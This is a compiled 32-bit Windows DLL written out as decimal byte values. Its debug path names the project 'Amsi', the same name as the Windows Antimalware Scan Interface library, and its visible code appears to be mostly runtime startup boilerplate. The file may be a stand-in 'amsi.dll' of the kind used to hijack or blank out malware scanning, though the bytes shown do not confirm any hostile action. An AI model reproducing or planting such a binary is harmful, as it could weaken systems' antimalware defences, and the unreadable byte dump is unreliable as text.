0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 190 171 71 149 250 202 41 198 250 202 41 198 250 202 41 198 243 178 186 198 248 202 41 198 148 145 40 199 249 202 41 198 148 145 42 199 251 202 41 198 148 145 44 199 242 202 41 198 148 145 45 199 241 202 41 198 39 53 226 198 248 202 41 198 250 202 40 198 231 202 41 198 40 145 33 199 251 202 41 198 40 145 214 198 251 202 41 198 40 145 43 199 251 202 41 198 82 105 99 104 250 202 41 198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 6 0 144 29 62 87 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 14 0 0 0 18 0 0 0 0 0 0 43 19 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 112 0 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 148 36 0 0 80 0 0 0 0 80 0 0 224 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 96 0 0 44 1 0 0 176 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 33 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 124 12 0 0 0 16 0 0 0 14 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 220 7 0 0 0 32 0 0 0 8 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 136 3 0 0 0 48 0 0 0 2 0 0 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 103 102 105 100 115 0 0 20 0 0 0 0 64 0 0 0 2 0 0 0 28 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 80 0 0 0 2 0 0 0 30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 44 1 0 0 0 96 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 194 12 0 59 13 4 48 0 16 242 117 2 242 195 242 233 96 3 0 0 85 139 236 139 69 12 131 232 0 116 51 131 232 1 116 32 131 232 1 116 17 131 232 1 116 5 51 192 64 235 48 232 245 4 0 0 235 5 232 207 4 0 0 15 182 192 235 31 255 117 16 255 117 8 232 24 0 0 0 89 235 16 131 125 16 0 15 149 192 15 182 192 80 232 23 1 0 0 89 93 194 12 0 106 16 104 24 36 0 16 232 123 9 0 0 106 0 232 35 5 0 0 89 132 192 117 7 51 192 233 224 0 0 0 232 40 4 0 0 136 69 227 179 1 136 93 231 131 101 252 0 131 61 60 51 0 16 0 116 7 106 7 232 203 7 0 0 199 5 60 51 0 16 1 0 0 0 232 74 4 0 0 132 192 116 101 232 206 8 0 0 104 186 25 0 16 232 177 6 0 0 232 93 7 0 0 199 4 36 57 24 0 16 232 160 6 0 0 232 112 7 0 0 199 4 36 128 32 0 16 104 124 32 0 16 232 78 11 0 0 89 89 133 192 117 41 232 237 3 0 0 132 192 116 32 104 120 32 0 16 104 116 32 0 16 232 42 11 0 0 89 89 199 5 60 51 0 16 2 0 0 0 50 219 136 93 231 199 69 252 254 255 255 255 232 68 0 0 0 132 219 15 133 76 255 255 255 232 52 7 0 0 139 240 131 62 0 116 30 86 232 40 5 0 0 89 132 192 116 19 255 117 12 106 2 255 117 8 139 54 139 206 232 136 8 0 0 255 214 255 5 24 48 0 16 51 192 64 232 201 8 0 0 195 138 93 231 255 117 227 232 131 5 0 0 89 195 106 12 104 56 36 0 16 232 105 8 0 0 161 24 48 0 16 133 192 127 4 51 192 235 79 72 163 24 48 0 16 232 22 3 0 0 136 69 228 131 101 252 0 131 61 60 51 0 16 2 116 7 106 7 232 190 6 0 0 232 180 3 0 0 131 37 60 51 0 16 0 199 69 252 254 255 255 255 232 27 0 0 0 106 0 255 117 8 232 65 5 0 0 89 89 51 201 132 192 15 149 193 139 193 232 78 8 0 0 195 232 164 3 0 0 255 117 228 232 6 5 0 0 89 195 106 12 104 88 36 0 16 232 236 7 0 0 131 101 252 0 139 125 12 131 255 1 116 10 131 255 2 116 5 139 93 8 235 49 255 117 16 87 139 93 8 83 232 218 0 0 0 139 240 137 117 228 133 246 15 132 190 0 0 0 255 117 16 87 83 232 216 253 255 255 139 240 137 117 228 133 246 15 132 167 0 0 0 131 255 1 117 7 83 232 198 9 0 0 89 255 117 16 87 83 232 159 253 255 255 139 240 137 117 228 131 255 1 117 43 133 246 117 30 255 117 16 80 83 232 135 253 255 255 255 117 16 86 83 232 147 253 255 255 255 117 16 86 83 232 116 0 0 0 131 255 1 117 4 133 246 116 4 133 255 117 11 83 232 130 9 0 0 89 133 255 116 5 131 255 3 117 72 255 117 16 87 83 232 98 253 255 255 139 240 137 117 228 133 246 116 53 255 117 16 87 83 232 58 0 0 0 139 240 235 36 139 77 236 139 1 81 255 48 104 22 16 0 16 255 117 16 255 117 12 255 117 8 232 86 2 0 0 131 196 24 195 139 101 232 51 246 137 117 228 199 69 252 254 255 255 255 139 198 232 54 7 0 0 195 85 139 236 86 139 53 160 32 0 16 133 246 117 5 51 192 64 235 18 255 117 16 139 206 255 117 12 255 117 8 232 193 6 0 0 255 214 94 93 194 12 0 85 139 236 131 125 12 1 117 5 232 88 4 0 0 255 117 16 255 117 12 255 117 8 232 177 254 255 255 131 196 12 93 194 12 0 85 139 236 106 0 255 21 40 32 0 16 255 117 8 255 21 0 32 0 16 104 9 4 0 192 255 21 4 32 0 16 80 255 21 8 32 0 16 93 195 85 139 236 129 236 36 3 0 0 106 23 232 234 8 0 0 133 192 116 5 106 2 89 205 41 163 32 49 0 16 137 13 28 49 0 16 137 21 24 49 0 16 137 29 20 49 0 16 137 53 16 49 0 16 137 61 12 49 0 16 102 140 21 56 49 0 16 102 140 13 44 49 0 16 102 140 29 8 49 0 16 102 140 5 4 49 0 16 102 140 37 0 49 0 16 102 140 45 252 48 0 16 156 143 5 48 49 0 16 139 69 0 163 36 49 0 16 139 69 4 163 40 49 0 16 141 69 8 163 52 49 0 16 139 133 220 252 255 255 199 5 112 48 0 16 1 0 1 0 161 40 49 0 16 163 44 48 0 16 199 5 32 48 0 16 9 4 0 192 199 5 36 48 0 16 1 0 0 0 199 5 48 48 0 16 1 0 0 0 106 4 88 107 192 0 199 128 52 48 0 16 2 0 0 0 106 4 88 107 192 0 139 13 4 48 0 16 137 76 5 248 106 4 88 193 224 0 139 13 0 48 0 16 137 76 5 248 104 164 32 0 16 232 225 254 255 255 139 229 93 195 85 139 236 139 69 8 86 139 72 60 3 200 15 183 65 20 141 81 24 3 208 15 183 65 6 107 240 40 3 242 59 214 116 25 139 77 12 59 74 12 114 10 139 66 8 3 66 12 59 200 114 12 131 194 40 59 214 117 234 51 192 94 93 195 139 194 235 249 232 85 7 0 0 133 192 117 3 50 192 195 100 161 24 0 0 0 86 190 64 51 0 16 139 80 4 235 4 59 208 116 16 51 192 139 202 240 15 177 14 133 192 117 240 50 192 94 195 176 1 94 195 232 32 7 0 0 133 192 116 7 232 118 5 0 0 235 5 232 77 7 0 0 176 1 195 106 0 232 207 0 0 0 132 192 89 15 149 192 195 232 97 7 0 0 132 192 117 3 50 192 195 232 85 7 0 0 132 192 117 7 232 76 7 0 0 235 237 176 1 195 232 66 7 0 0 232 61 7 0 0 176 1 195 85 139 236 232 203 6 0 0 133 192 117 24 131 125 12 1 117 18 255 117 16 139 77 20 80 255 117 8 232 136 4 0 0 255 85 20 255 117 28 255 117 24 232 219 6 0 0 89 89 93 195 232 155 6 0 0 133 192 116 12 104 68 51 0 16 232 220 6 0 0 89 195 232 240 6 0 0 133 192 15 132 217 6 0 0 195 106 0 232 221 6 0 0 89 233 215 6 0 0 85 139 236 131 125 8 0 117 7 198 5 92 51 0 16 1 232 186 4 0 0 232 189 6 0 0 132 192 117 4 50 192 93 195 232 176 6 0 0 132 192 117 10 106 0 232 165 6 0 0 89 235 233 176 1 93 195 85 139 236 131 236 12 86 139 117 8 133 246 116 5 131 254 1 117 124 232 31 6 0 0 133 192 116 42 133 246 117 38 104 68 51 0 16 232 80 6 0 0 89 133 192 116 4 50 192 235 87 104 80 51 0 16 232 61 6 0 0 247 216 89 26 192 254 192 235 68 161 4 48 0 16 141 117 244 87 131 224 31 191 68 51 0 16 106 32 89 43 200 131 200 255 211 200 51 5 4 48 0 16 137 69 244 137 69 248 137 69 252 165 165 165 191 80 51 0 16 137 69 244 137 69 248 141 117 244 137 69 252 176 1 165 165 165 95 94 139 229 93 195 106 5 232 6 2 0 0 204 106 8 104 120 36 0 16 232 117 3 0 0 131 101 252 0 184 77 90 0 0 102 57 5 0 0 0 16 117 96 161 60 0 0 16 129 184 0 0 0 16 80 69 0 0 117 79 185 11 1 0 0 102 57 136 24 0 0 16 117 65 139 69 8 185 0 0 0 16 43 193 80 81 232 180 253 255 255 89 89 133 192 116 42 247 64 36 0 0 0 128 117 33 199 69 252 254 255 255 255 176 1 235 31 139 69 236 139 0 51 201 129 56 5 0 0 192 15 148 193 139 193 195 139 101 232 199 69 252 254 255 255 255 50 192 232 59 3 0 0 195 85 139 236 232 11 5 0 0 133 192 116 15 128 125 8 0 117 9 51 192 185 64 51 0 16 135 1 93 195 85 139 236 128 61 92 51 0 16 0 116 6 128 125 12 0 117 18 255 117 8 232 67 5 0 0 255 117 8 232 59 5 0 0 89 89 176 1 93 195 85 139 236 161 4 48 0 16 139 200 51 5 68 51 0 16 131 225 31 255 117 8 211 200 131 248 255 117 7 232 1 5 0 0 235 11 104 68 51 0 16 232 233 4 0 0 89 247 216 89 27 192 247 208 35 69 8 93 195 85 139 236 255 117 8 232 186 255 255 255 247 216 89 27 192 247 216 72 93 195 85 139 236 131 236 20 131 101 244 0 131 101 248 0 161 4 48 0 16 86 87 191 78 230 64 187 190 0 0 255 255 59 199 116 13 133 198 116 9 247 208 163 0 48 0 16 235 102 141 69 244 80 255 21 28 32 0 16 139 69 248 51 69 244 137 69 252 255 21 32 32 0 16 49 69 252 255 21 36 32 0 16 49 69 252 141 69 236 80 255 21 16 32 0 16 139 77 240 141 69 252 51 77 236 51 77 252 51 200 59 207 117 7 185 79 230 64 187 235 16 133 206 117 12 139 193 13 17 71 0 0 193 224 16 11 200 137 13 4 48 0 16 247 209 137 13 0 48 0 16 95 94 139 229 93 195 104 96 51 0 16 255 21 24 32 0 16 195 104 96 51 0 16 232 229 3 0 0 89 195 184 104 51 0 16 195 184 112 51 0 16 195 232 239 255 255 255 139 72 4 131 8 4 137 72 4 232 231 255 255 255 139 72 4 131 8 2 137 72 4 195 184 132 51 0 16 195 85 139 236 129 236 36 3 0 0 83 86 106 23 232 234 3 0 0 133 192 116 5 139 77 8 205 41 51 246 141 133 220 252 255 255 104 204 2 0 0 86 80 137 53 120 51 0 16 232 133 3 0 0 131 196 12 137 133 140 253 255 255 137 141 136 253 255 255 137 149 132 253 255 255 137 157 128 253 255 255 137 181 124 253 255 255 137 189 120 253 255 255 102 140 149 164 253 255 255 102 140 141 152 253 255 255 102 140 157 116 253 255 255 102 140 133 112 253 255 255 102 140 165 108 253 255 255 102 140 173 104 253 255 255 156 143 133 156 253 255 255 139 69 4 137 133 148 253 255 255 141 69 4 137 133 160 253 255 255 199 133 220 252 255 255 1 0 1 0 139 64 252 106 80 137 133 144 253 255 255 141 69 168 86 80 232 252 2 0 0 139 69 4 131 196 12 199 69 168 21 0 0 64 199 69 172 1 0 0 0 137 69 180 255 21 20 32 0 16 86 141 88 255 247 219 141 69 168 137 69 248 141 133 220 252 255 255 26 219 137 69 252 254 195 255 21 40 32 0 16 141 69 248 80 255 21 0 32 0 16 133 192 117 13 15 182 195 247 216 27 192 33 5 120 51 0 16 94 91 139 229 93 195 83 86 190 8 36 0 16 187 8 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 56 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 83 86 190 16 36 0 16 187 16 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 13 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 255 37 112 32 0 16 204 204 204 204 204 104 75 26 0 16 100 255 53 0 0 0 0 139 68 36 16 137 108 36 16 141 108 36 16 43 224 83 86 87 161 4 48 0 16 49 69 252 51 197 80 137 101 232 255 117 248 139 69 252 199 69 252 254 255 255 255 137 69 248 141 69 240 100 163 0 0 0 0 242 195 139 77 240 100 137 13 0 0 0 0 89 95 95 94 91 139 229 93 81 242 195 85 139 236 255 117 20 255 117 16 255 117 12 255 117 8 104 5 16 0 16 104 4 48 0 16 232 203 1 0 0 131 196 24 93 195 85 139 236 131 37 124 51 0 16 0 131 236 44 83 51 219 67 9 29 16 48 0 16 106 10 232 228 1 0 0 133 192 15 132 116 1 0 0 131 101 236 0 51 192 131 13 16 48 0 16 2 51 201 86 87 137 29 124 51 0 16 141 125 212 83 15 162 139 243 91 137 7 137 119 4 137 79 8 137 87 12 139 69 212 139 77 224 137 69 244 129 241 105 110 101 73 139 69 220 53 110 116 101 108 11 200 139 69 216 53 71 101 110 117 11 200 247 217 106 1 88 26 201 106 0 128 193 1 89 83 15 162 139 243 91 137 7 137 119 4 137 79 8 137 87 12 116 67 139 69 212 37 240 63 255 15 61 192 6 1 0 116 35 61 96 6 2 0 116 28 61 112 6 2 0 116 21 61 80 6 3 0 116 14 61 96 6 3 0 116 7 61 112 6 3 0 117 17 139 61 128 51 0 16 131 207 1 137 61 128 51 0 16 235 6 139 61 128 51 0 16 131 125 244 7 139 69 224 137 69 228 139 69 220 137 69 248 137 69 232 124 50 106 7 88 51 201 83 15 162 139 243 91 141 93 212 137 3 137 115 4 137 75 8 137 83 12 139 69 216 169 0 2 0 0 137 69 236 139 69 248 116 9 131 207 2 137 61 128 51 0 16 95 94 169 0 0 16 0 116 109 131 13 16 48 0 16 4 199 5 124 51 0 16 2 0 0 0 169 0 0 0 8 116 85 169 0 0 0 16 116 78 51 201 15 1 208 137 69 240 137 85 244 139 69 240 139 77 244 131 224 6 51 201 131 248 6 117 51 133 201 117 47 161 16 48 0 16 131 200 8 199 5 124 51 0 16 3 0 0 0 246 69 236 32 163 16 48 0 16 116 18 131 200 32 199 5 124 51 0 16 5 0 0 0 163 16 48 0 16 51 192 91 139 229 93 195 51 192 57 5 20 48 0 16 15 149 192 195 195 255 37 52 32 0 16 255 37 60 32 0 16 255 37 56 32 0 16 255 37 48 32 0 16 255 37 64 32 0 16 255 37 104 32 0 16 255 37 100 32 0 16 255 37 96 32 0 16 255 37 92 32 0 16 255 37 88 32 0 16 255 37 84 32 0 16 255 37 80 32 0 16 255 37 76 32 0 16 255 37 72 32 0 16 255 37 12 32 0 16 176 1 195 51 192 195 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 27 28 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 48 0 16 112 48 0 16 0 0 0 0 0 0 0 0 144 29 62 87 0 0 0 0 2 0 0 0 61 0 0 0 132 33 0 0 132 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 196 33 0 0 196 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 13 0 0 0 44 2 0 0 216 33 0 0 216 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 92 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 48 0 16 128 33 0 16 1 0 0 0 112 32 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 75 26 0 0 82 83 68 83 69 10 117 219 0 114 41 77 133 149 98 78 29 103 122 248 7 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 20 0 0 0 20 0 0 0 1 0 0 0 19 0 0 0 71 67 84 76 0 16 0 0 124 12 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 112 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 112 32 0 0 4 0 0 0 46 48 48 99 102 103 0 0 116 32 0 0 4 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 120 32 0 0 4 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 124 32 0 0 4 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 128 32 0 0 4 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 132 32 0 0 4 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 136 32 0 0 4 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 140 32 0 0 4 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 144 32 0 0 4 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 160 32 0 0 220 0 0 0 46 114 100 97 116 97 0 0 128 33 0 0 4 0 0 0 46 114 100 97 116 97 36 115 120 100 97 116 97 0 0 0 132 33 0 0 128 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 4 36 0 0 4 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 8 36 0 0 4 0 0 0 46 114 116 99 36 73 90 90 0 0 0 0 12 36 0 0 4 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 16 36 0 0 4 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 24 36 0 0 124 0 0 0 46 120 100 97 116 97 36 120 0 0 0 0 148 36 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 208 36 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 228 36 0 0 112 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 84 37 0 0 136 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 24 0 0 0 46 100 97 116 97 0 0 0 24 48 0 0 112 3 0 0 46 98 115 115 0 0 0 0 0 64 0 0 20 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 80 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 80 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 255 255 0 0 0 0 208 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 110 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 233 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 203 18 0 16 234 18 0 16 0 0 0 0 254 255 255 255 0 0 0 0 216 255 255 255 0 0 0 0 254 255 255 255 215 22 0 16 234 22 0 16 20 37 0 0 0 0 0 0 0 0 0 0 220 37 0 0 48 32 0 0 44 37 0 0 0 0 0 0 0 0 0 0 164 38 0 0 72 32 0 0 228 36 0 0 0 0 0 0 0 0 0 0 206 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 72 0 109 101 109 115 101 116 0 0 53 0 95 101 120 99 101 112 116 95 104 97 110 100 108 101 114 52 95 99 111 109 109 111 110 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 56 0 95 105 110 105 116 116 101 114 109 0 57 0 95 105 110 105 116 116 101 114 109 95 101 0 65 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 53 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 54 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 0 62 0 95 114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 36 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 31 0 95 99 114 116 95 97 116 101 120 105 116 0 23 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 130 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 67 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 9 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 97 5 84 101 114 109 105 110 97 116 101 80 114 111 99 101 115 115 0 0 109 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 45 4 81 117 101 114 121 80 101 114 102 111 114 109 97 110 99 101 67 111 117 110 116 101 114 0 10 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 14 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 214 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 75 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 103 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 177 25 191 68 78 230 64 187 255 255 255 255 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 12 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 